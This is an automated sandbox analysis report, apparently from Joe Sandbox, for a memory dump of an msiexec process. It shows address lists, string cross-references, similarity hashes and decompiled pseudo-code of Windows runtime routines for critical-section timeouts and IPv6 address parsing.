                                            0x027722bc
                                            0x027722bc
                                            0x027722be
                                            0x027722c4
                                            0x027722cc
                                            0x027722d0
                                            0x027722d6
                                            0x027722d7
                                            0x027722da
                                            0x027722df
                                            0x027722e4
                                            0x00000000
                                            0x00000000
                                            0x027722e6
                                            0x027722e9
                                            0x027722f4
                                            0x027722f9
                                            0x027722fa
                                            0x02772305
                                            0x02772314
                                            0x02772319
                                            0x0277231a
                                            0x0277231d
                                            0x02772320
                                            0x02772323
                                            0x02772323
                                            0x02772328
                                            0x0277232d
                                            0x0277232f
                                            0x02772331
                                            0x02772336
                                            0x02772336
                                            0x0277233b
                                            0x0277233d
                                            0x02772350
                                            0x02772351
                                            0x02772356
                                            0x02772359
                                            0x02772359
                                            0x0277235b
                                            0x0277235d
                                            0x02735367
                                            0x0273536b
                                            0x02735372
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x02772363
                                            0x02772363
                                            0x02772369
                                            0x0277236a
                                            0x0277236c
                                            0x02772371
                                            0x02772373
                                            0x00000000
                                            0x02772379
                                            0x02772379
                                            0x0277237a
                                            0x0277237f
                                            0x0277237f
                                            0x02772385
                                            0x02772386
                                            0x02772389
                                            0x0277238e
                                            0x02772390
                                            0x02735378
                                            0x0273537c
                                            0x02772396
                                            0x02772396
                                            0x02772397
                                            0x0277239c
                                            0x027723a2
                                            0x027723a3
                                            0x027723a6
                                            0x027723ab
                                            0x027723ad
                                            0x00000000
                                            0x027723b3
                                            0x027723b3
                                            0x027723b4
                                            0x027723b9
                                            0x027723ba
                                            0x027723ba
                                            0x027723bc
                                            0x027723bf
                                            0x00000000
                                            0x00000000
                                            0x02769153
                                            0x02769158
                                            0x0276915a
                                            0x0276915e
                                            0x02769160
                                            0x00000000
                                            0x02769166
                                            0x02769166
                                            0x02769171
                                            0x02769176
                                            0x02769176
                                            0x00000000
                                            0x02769160
                                            0x027723c6
                                            0x027723cb
                                            0x027723d7
                                            0x027723d7
                                            0x027723ad
                                            0x02772390
                                            0x02772373
                                            0x0277233f
                                            0x0277233f
                                            0x00000000
                                            0x0277233f
                                            0x02772291
                                            0x02772291
                                            0x02772293
                                            0x02772295
                                            0x0277229a
                                            0x027722a1
                                            0x027722a3
                                            0x027722a7
                                            0x027722a9
                                            0x00000000
                                            0x00000000
                                            0x027722ab
                                            0x027722ad
                                            0x027722af
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x027722af
                                            0x027722b1
                                            0x027722b4
                                            0x027722b4
                                            0x027722b6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x027722b6
                                            0x0277228f
                                            0x00000000
                                            0x0277226d
                                            0x027353cb
                                            0x027353ce
                                            0x027353d0
                                            0x027353d4
                                            0x027353d6
                                            0x00000000
                                            0x027353d8
                                            0x027353e3
                                            0x027353ea
                                            0x027353ea
                                            0x027353d6
                                            0x00000000

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 027722F4
                                            Strings
                                            • RTL: Resource at %p, xrefs: 0277230B
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 027722FC
                                            • RTL: Re-Waiting, xrefs: 02772328
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-871070163
                                            • Opcode ID: f30a9c1c52847a290a426e174168d6350e3a1e3d89c08978b49335e60cc357e0
                                            • Instruction ID: 41beee4be2eab728d3cedc053a27c08e2b56ddc9d2e0420de24bc090c2d49f7e
                                            • Opcode Fuzzy Hash: f30a9c1c52847a290a426e174168d6350e3a1e3d89c08978b49335e60cc357e0
                                            • Instruction Fuzzy Hash: 165107B16007116BEF16DF28CC84FA773A9EF59728F114219FD19DB281EB61E8418BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 51%
                                            			E0273EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				signed int _v24;
                                            				intOrPtr* _v28;
                                            				intOrPtr _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				short _v66;
                                            				char _v72;
                                            				void* __esi;
                                            				intOrPtr _t38;
                                            				intOrPtr _t39;
                                            				signed int _t40;
                                            				intOrPtr _t42;
                                            				intOrPtr _t43;
                                            				signed int _t44;
                                            				void* _t46;
                                            				intOrPtr _t48;
                                            				signed int _t49;
                                            				intOrPtr _t50;
                                            				intOrPtr _t53;
                                            				signed char _t67;
                                            				void* _t72;
                                            				intOrPtr _t77;
                                            				intOrPtr* _t80;
                                            				intOrPtr _t84;
                                            				intOrPtr* _t85;
                                            				void* _t91;
                                            				void* _t92;
                                            				void* _t93;
                                            
                                            				_t80 = __edi;
                                            				_t75 = __edx;
                                            				_t70 = __ecx;
                                            				_t84 = _a4;
                                            				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                            					E0272DA92(__ecx, __edx, __eflags, _t84);
                                            					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                            				}
                                            				_push(0);
                                            				__eflags = _t38 - 0xffffffff;
                                            				if(_t38 == 0xffffffff) {
                                            					_t39 =  *0x27f793c; // 0x0
                                            					_push(0);
                                            					_push(_t84);
                                            					_t40 = E027116C0(_t39);
                                            				} else {
                                            					_t40 = E0270F9D4(_t38);
                                            				}
                                            				_pop(_t85);
                                            				__eflags = _t40;
                                            				if(__eflags < 0) {
                                            					_push(_t40);
                                            					E02753915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                            					asm("int3");
                                            					while(1) {
                                            						L21:
                                            						_t76 =  *[fs:0x18];
                                            						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                            						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                            						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                            							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                            							_v66 = 0x1722;
                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                            							_t76 =  &_v72;
                                            							_push( &_v72);
                                            							_v28 = _t85;
                                            							_v40 =  *((intOrPtr*)(_t85 + 4));
                                            							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                            							_push(0x10);
                                            							_push(0x20402);
                                            							E027101A4( *0x7ffe0382 & 0x000000ff);
                                            						}
                                            						while(1) {
                                            							_t43 = _v8;
                                            							_push(_t80);
                                            							_push(0);
                                            							__eflags = _t43 - 0xffffffff;
                                            							if(_t43 == 0xffffffff) {
                                            								_t71 =  *0x27f793c; // 0x0
                                            								_push(_t85);
                                            								_t44 = E02711F28(_t71);
                                            							} else {
                                            								_t44 = E0270F8CC(_t43);
                                            							}
                                            							__eflags = _t44 - 0x102;
                                            							if(_t44 != 0x102) {
                                            								__eflags = _t44;
                                            								if(__eflags < 0) {
                                            									_push(_t44);
                                            									E02753915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                            									asm("int3");
                                            									E02792306(_t85);
                                            									__eflags = _t67 & 0x00000002;
                                            									if((_t67 & 0x00000002) != 0) {
                                            										_t7 = _t67 + 2; // 0x4
                                            										_t72 = _t7;
                                            										asm("lock cmpxchg [edi], ecx");
                                            										__eflags = _t67 - _t67;
                                            										if(_t67 == _t67) {
                                            											E0273EC56(_t72, _t76, _t80, _t85);
                                            										}
                                            									}
                                            									return 0;
                                            								} else {
                                            									__eflags = _v24;
                                            									if(_v24 != 0) {
                                            										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                            									}
                                            									return 2;
                                            								}
                                            								goto L36;
                                            							}
                                            							_t77 =  *((intOrPtr*)(_t80 + 4));
                                            							_push(_t67);
                                            							_t46 = E02754FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                            							_push(_t77);
                                            							E02763F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                            							_t48 =  *_t85;
                                            							_t92 = _t91 + 0x18;
                                            							__eflags = _t48 - 0xffffffff;
                                            							if(_t48 == 0xffffffff) {
                                            								_t49 = 0;
                                            								__eflags = 0;
                                            							} else {
                                            								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                            							}
                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                            							_push(_t49);
                                            							_t50 = _v12;
                                            							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                            							_push(_t85);
                                            							_push( *((intOrPtr*)(_t85 + 0xc)));
                                            							_push( *((intOrPtr*)(_t50 + 0x24)));
                                            							E02763F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                            							_t53 =  *_t85;
                                            							_t93 = _t92 + 0x20;
                                            							_t67 = _t67 + 1;
                                            							__eflags = _t53 - 0xffffffff;
                                            							if(_t53 != 0xffffffff) {
                                            								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                            								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                            							}
                                            							__eflags = _t67 - 2;
                                            							if(_t67 > 2) {
                                            								__eflags = _t85 - 0x27f20c0;
                                            								if(_t85 != 0x27f20c0) {
                                            									_t76 = _a4;
                                            									__eflags = _a4 - _a8;
                                            									if(__eflags == 0) {
                                            										E0279217A(_t71, __eflags, _t85);
                                            									}
                                            								}
                                            							}
                                            							_push("RTL: Re-Waiting\n");
                                            							_push(0);
                                            							_push(0x65);
                                            							_a8 = _a4;
                                            							E02763F92();
                                            							_t91 = _t93 + 0xc;
                                            							__eflags =  *0x7ffe0382;
                                            							if( *0x7ffe0382 != 0) {
                                            								goto L21;
                                            							}
                                            						}
                                            						goto L36;
                                            					}
                                            				} else {
                                            					return _t40;
                                            				}
                                            				L36:
                                            			}

































                                            0x0273ec56
                                            0x0273ec56
                                            0x0273ec56
                                            0x0273ec5c
                                            0x0273ec64
                                            0x027723e6
                                            0x027723eb
                                            0x027723eb
                                            0x0273ec6a
                                            0x0273ec6c
                                            0x0273ec6f
                                            0x027723f3
                                            0x027723f8
                                            0x027723fa
                                            0x027723fc
                                            0x0273ec75
                                            0x0273ec76
                                            0x0273ec76
                                            0x0273ec7b
                                            0x0273ec7c
                                            0x0273ec7e
                                            0x02772406
                                            0x02772407
                                            0x0277240c
                                            0x0277240d
                                            0x0277240d
                                            0x0277240d
                                            0x02772414
                                            0x02772417
                                            0x0277241e
                                            0x02772435
                                            0x02772438
                                            0x0277243c
                                            0x0277243f
                                            0x02772442
                                            0x02772443
                                            0x02772446
                                            0x02772449
                                            0x02772453
                                            0x02772455
                                            0x0277245b
                                            0x0277245b
                                            0x0273eb99
                                            0x0273eb99
                                            0x0273eb9c
                                            0x0273eb9d
                                            0x0273eb9f
                                            0x0273eba2
                                            0x02772465
                                            0x0277246b
                                            0x0277246d
                                            0x0273eba8
                                            0x0273eba9
                                            0x0273eba9
                                            0x0273ebae
                                            0x0273ebb3
                                            0x0273ebb9
                                            0x0273ebbb
                                            0x02772513
                                            0x02772514
                                            0x02772519
                                            0x0277251b
                                            0x0273ec2a
                                            0x0273ec2d
                                            0x0273ec33
                                            0x0273ec36
                                            0x0273ec3a
                                            0x0273ec3e
                                            0x0273ec40
                                            0x0273ec47
                                            0x0273ec47
                                            0x0273ec40
                                            0x027122c6
                                            0x0273ebc1
                                            0x0273ebc1
                                            0x0273ebc5
                                            0x0273ec9a
                                            0x0273ec9a
                                            0x0273ebd6
                                            0x0273ebd6
                                            0x00000000
                                            0x0273ebbb
                                            0x02772477
                                            0x0277247c
                                            0x02772486
                                            0x0277248b
                                            0x02772496
                                            0x0277249b
                                            0x0277249d
                                            0x027724a0
                                            0x027724a3
                                            0x027724aa
                                            0x027724aa
                                            0x027724a5
                                            0x027724a5
                                            0x027724a5
                                            0x027724ac
                                            0x027724af
                                            0x027724b0
                                            0x027724b3
                                            0x027724b9
                                            0x027724ba
                                            0x027724bb
                                            0x027724c6
                                            0x027724cb
                                            0x027724cd
                                            0x027724d0
                                            0x027724d1
                                            0x027724d4
                                            0x027724d6
                                            0x027724d9
                                            0x027724d9
                                            0x027724dc
                                            0x027724df
                                            0x027724e1
                                            0x027724e7
                                            0x027724e9
                                            0x027724ec
                                            0x027724ef
                                            0x027724f2
                                            0x027724f2
                                            0x027724ef
                                            0x027724e7
                                            0x027724fa
                                            0x027724ff
                                            0x02772501
                                            0x02772503
                                            0x02772506
                                            0x0277250b
                                            0x0273eb8c
                                            0x0273eb93
                                            0x00000000
                                            0x00000000
                                            0x0273eb93
                                            0x00000000
                                            0x0273eb99
                                            0x0273ec85
                                            0x0273ec85
                                            0x0273ec85
                                            0x00000000

                                            Strings
                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 027724BD
                                            • RTL: Re-Waiting, xrefs: 027724FA
                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0277248D
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                            • API String ID: 0-3177188983
                                            • Opcode ID: 18e94d010fb2808f1f540e3b3b2f209556317ad96556815c717460035d050e6c
                                            • Instruction ID: 74e062fe92d8a61807f89dbe9915cb5bcba8b13d4040fd688e540f3b5b286ed4
                                            • Opcode Fuzzy Hash: 18e94d010fb2808f1f540e3b3b2f209556317ad96556815c717460035d050e6c
                                            • Instruction Fuzzy Hash: 2E41E8B0600204AFDB21DF68CC89FAA77B9EF45720F108655FD65AB2C2D734E941CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0274FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _t105;
                                            				void* _t110;
                                            				char _t114;
                                            				short _t115;
                                            				void* _t118;
                                            				signed short* _t119;
                                            				short _t120;
                                            				char _t122;
                                            				void* _t127;
                                            				void* _t130;
                                            				signed int _t136;
                                            				intOrPtr _t143;
                                            				signed int _t158;
                                            				signed short* _t164;
                                            				signed int _t167;
                                            				void* _t170;
                                            
                                            				_t158 = 0;
                                            				_t164 = _a4;
                                            				_v20 = 0;
                                            				_v24 = 0;
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				_v16 = 0;
                                            				_v28 = 0;
                                            				_t136 = 0;
                                            				while(1) {
                                            					_t167 =  *_t164 & 0x0000ffff;
                                            					if(_t167 == _t158) {
                                            						break;
                                            					}
                                            					_t118 = _v20 - _t158;
                                            					if(_t118 == 0) {
                                            						if(_t167 == 0x3a) {
                                            							if(_v12 > _t158 || _v8 > _t158) {
                                            								break;
                                            							} else {
                                            								_t119 =  &(_t164[1]);
                                            								if( *_t119 != _t167) {
                                            									break;
                                            								}
                                            								_t143 = 2;
                                            								 *((short*)(_a12 + _t136 * 2)) = 0;
                                            								_v28 = 1;
                                            								_v8 = _t143;
                                            								_t136 = _t136 + 1;
                                            								L47:
                                            								_t164 = _t119;
                                            								_v20 = _t143;
                                            								L14:
                                            								if(_v24 == _t158) {
                                            									L19:
                                            									_t164 =  &(_t164[1]);
                                            									_t158 = 0;
                                            									continue;
                                            								}
                                            								if(_v12 == _t158) {
                                            									if(_v16 > 4) {
                                            										L29:
                                            										return 0xc000000d;
                                            									}
                                            									_t120 = E0274EE02(_v24, _t158, 0x10);
                                            									_t170 = _t170 + 0xc;
                                            									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                            									_t136 = _t136 + 1;
                                            									goto L19;
                                            								}
                                            								if(_v16 > 3) {
                                            									goto L29;
                                            								}
                                            								_t122 = E0274EE02(_v24, _t158, 0xa);
                                            								_t170 = _t170 + 0xc;
                                            								if(_t122 > 0xff) {
                                            									goto L29;
                                            								}
                                            								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                            								goto L19;
                                            							}
                                            						}
                                            						L21:
                                            						if(_v8 > 7 || _t167 >= 0x80) {
                                            							break;
                                            						} else {
                                            							if(E0274685D(_t167, 4) == 0) {
                                            								if(E0274685D(_t167, 0x80) != 0) {
                                            									if(_v12 > 0) {
                                            										break;
                                            									}
                                            									_t127 = 1;
                                            									_a7 = 1;
                                            									_v24 = _t164;
                                            									_v20 = 1;
                                            									_v16 = 1;
                                            									L36:
                                            									if(_v20 == _t127) {
                                            										goto L19;
                                            									}
                                            									_t158 = 0;
                                            									goto L14;
                                            								}
                                            								break;
                                            							}
                                            							_a7 = 0;
                                            							_v24 = _t164;
                                            							_v20 = 1;
                                            							_v16 = 1;
                                            							goto L19;
                                            						}
                                            					}
                                            					_t130 = _t118 - 1;
                                            					if(_t130 != 0) {
                                            						if(_t130 == 1) {
                                            							goto L21;
                                            						}
                                            						_t127 = 1;
                                            						goto L36;
                                            					}
                                            					if(_t167 >= 0x80) {
                                            						L7:
                                            						if(_t167 == 0x3a) {
                                            							_t158 = 0;
                                            							if(_v12 > 0 || _v8 > 6) {
                                            								break;
                                            							} else {
                                            								_t119 =  &(_t164[1]);
                                            								if( *_t119 != _t167) {
                                            									_v8 = _v8 + 1;
                                            									L13:
                                            									_v20 = _t158;
                                            									goto L14;
                                            								}
                                            								if(_v28 != 0) {
                                            									break;
                                            								}
                                            								_v28 = _v8 + 1;
                                            								_t143 = 2;
                                            								_v8 = _v8 + _t143;
                                            								goto L47;
                                            							}
                                            						}
                                            						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                            							break;
                                            						} else {
                                            							_v12 = _v12 + 1;
                                            							_t158 = 0;
                                            							goto L13;
                                            						}
                                            					}
                                            					if(E0274685D(_t167, 4) != 0) {
                                            						_v16 = _v16 + 1;
                                            						goto L19;
                                            					}
                                            					if(E0274685D(_t167, 0x80) != 0) {
                                            						_v16 = _v16 + 1;
                                            						if(_v12 > 0) {
                                            							break;
                                            						}
                                            						_a7 = 1;
                                            						goto L19;
                                            					}
                                            					goto L7;
                                            				}
                                            				 *_a8 = _t164;
                                            				if(_v12 != 0) {
                                            					if(_v12 != 3) {
                                            						goto L29;
                                            					}
                                            					_v8 = _v8 + 1;
                                            				}
                                            				if(_v28 != 0 || _v8 == 7) {
                                            					if(_v20 != 1) {
                                            						if(_v20 != 2) {
                                            							goto L29;
                                            						}
                                            						 *((short*)(_a12 + _t136 * 2)) = 0;
                                            						L65:
                                            						_t105 = _v28;
                                            						if(_t105 != 0) {
                                            							_t98 = (_t105 - _v8) * 2; // 0x11
                                            							E02728980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                            							_t110 = 8;
                                            							E0271DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                            						}
                                            						return 0;
                                            					}
                                            					if(_v12 != 0) {
                                            						if(_v16 > 3) {
                                            							goto L29;
                                            						}
                                            						_t114 = E0274EE02(_v24, 0, 0xa);
                                            						_t170 = _t170 + 0xc;
                                            						if(_t114 > 0xff) {
                                            							goto L29;
                                            						}
                                            						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                            						goto L65;
                                            					}
                                            					if(_v16 > 4) {
                                            						goto L29;
                                            					}
                                            					_t115 = E0274EE02(_v24, 0, 0x10);
                                            					_t170 = _t170 + 0xc;
                                            					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                            					goto L65;
                                            				} else {
                                            					goto L29;
                                            				}
                                            			}

























                                            0x0274fcd1
                                            0x0274fcd6
                                            0x0274fcd9
                                            0x0274fcdc
                                            0x0274fcdf
                                            0x0274fce2
                                            0x0274fce5
                                            0x0274fce8
                                            0x0274fceb
                                            0x0274fced
                                            0x0274fced
                                            0x0274fcf3
                                            0x00000000
                                            0x00000000
                                            0x0274fcfc
                                            0x0274fcfe
                                            0x0274fdc1
                                            0x0277ecbd
                                            0x00000000
                                            0x0277eccc
                                            0x0277eccc
                                            0x0277ecd2
                                            0x00000000
                                            0x00000000
                                            0x0277ecdf
                                            0x0277ece0
                                            0x0277ece4
                                            0x0277eceb
                                            0x0277ecee
                                            0x0277eca8
                                            0x0277eca8
                                            0x0277ecaa
                                            0x0274fd76
                                            0x0274fd79
                                            0x0274fdb4
                                            0x0274fdb5
                                            0x0274fdb6
                                            0x00000000
                                            0x0274fdb6
                                            0x0274fd7e
                                            0x0277ecfc
                                            0x0274fe2f
                                            0x00000000
                                            0x0274fe2f
                                            0x0277ed08
                                            0x0277ed0f
                                            0x0277ed17
                                            0x0277ed1b
                                            0x00000000
                                            0x0277ed1b
                                            0x0274fd88
                                            0x00000000
                                            0x00000000
                                            0x0274fd94
                                            0x0274fd99
                                            0x0274fda1
                                            0x00000000
                                            0x00000000
                                            0x0274fdb0
                                            0x00000000
                                            0x0274fdb0
                                            0x0277ecbd
                                            0x0274fdc7
                                            0x0274fdcb
                                            0x00000000
                                            0x0274fdd7
                                            0x0274fde3
                                            0x0274fe06
                                            0x02761fe7
                                            0x00000000
                                            0x00000000
                                            0x02761fef
                                            0x02761ff0
                                            0x02761ff4
                                            0x02761ff7
                                            0x02761ffa
                                            0x02761ffd
                                            0x02762000
                                            0x00000000
                                            0x00000000
                                            0x0277ecf1
                                            0x00000000
                                            0x0277ecf1
                                            0x00000000
                                            0x0274fe06
                                            0x0274fde8
                                            0x0274fdec
                                            0x0274fdef
                                            0x0274fdf2
                                            0x00000000
                                            0x0274fdf2
                                            0x0274fdcb
                                            0x0274fd04
                                            0x0274fd05
                                            0x0277ec67
                                            0x00000000
                                            0x00000000
                                            0x0277ec6f
                                            0x00000000
                                            0x0277ec6f
                                            0x0274fd13
                                            0x0274fd3c
                                            0x0274fd40
                                            0x0277ec75
                                            0x0277ec7a
                                            0x00000000
                                            0x0277ec8a
                                            0x0277ec8a
                                            0x0277ec90
                                            0x0277ecb2
                                            0x0274fd73
                                            0x0274fd73
                                            0x00000000
                                            0x0274fd73
                                            0x0277ec95
                                            0x00000000
                                            0x00000000
                                            0x0277eca1
                                            0x0277eca4
                                            0x0277eca5
                                            0x00000000
                                            0x0277eca5
                                            0x0277ec7a
                                            0x0274fd4a
                                            0x00000000
                                            0x0274fd6e
                                            0x0274fd6e
                                            0x0274fd71
                                            0x00000000
                                            0x0274fd71
                                            0x0274fd4a
                                            0x0274fd21
                                            0x0275a3a1
                                            0x00000000
                                            0x0275a3a1
                                            0x0274fd36
                                            0x0276200b
                                            0x02762012
                                            0x00000000
                                            0x00000000
                                            0x02762018
                                            0x00000000
                                            0x02762018
                                            0x00000000
                                            0x0274fd36
                                            0x0274fe0f
                                            0x0274fe16
                                            0x0275a3ad
                                            0x00000000
                                            0x00000000
                                            0x0275a3b3
                                            0x0275a3b3
                                            0x0274fe1f
                                            0x0277ed25
                                            0x0277ed86
                                            0x00000000
                                            0x00000000
                                            0x0277ed91
                                            0x0277ed95
                                            0x0277ed95
                                            0x0277ed9a
                                            0x0277edad
                                            0x0277edb3
                                            0x0277edba
                                            0x0277edc4
                                            0x0277edc9
                                            0x00000000
                                            0x0277edcc
                                            0x0277ed2a
                                            0x0277ed55
                                            0x00000000
                                            0x00000000
                                            0x0277ed61
                                            0x0277ed66
                                            0x0277ed6e
                                            0x00000000
                                            0x00000000
                                            0x0277ed7d
                                            0x00000000
                                            0x0277ed7d
                                            0x0277ed30
                                            0x00000000
                                            0x00000000
                                            0x0277ed3c
                                            0x0277ed43
                                            0x0277ed4b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: __fassign
                                            • String ID:
                                            • API String ID: 3965848254-0
                                            • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                            • Instruction ID: ade82580ae7b91a645fb3e938f70239dbed722a4e6980cb4f822df56ab48db7f
                                            • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                            • Instruction Fuzzy Hash: FA919D31D0022AEFDF24CF9AC8497EEB7B5FF45319F24806AD415A7651EB305A81CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%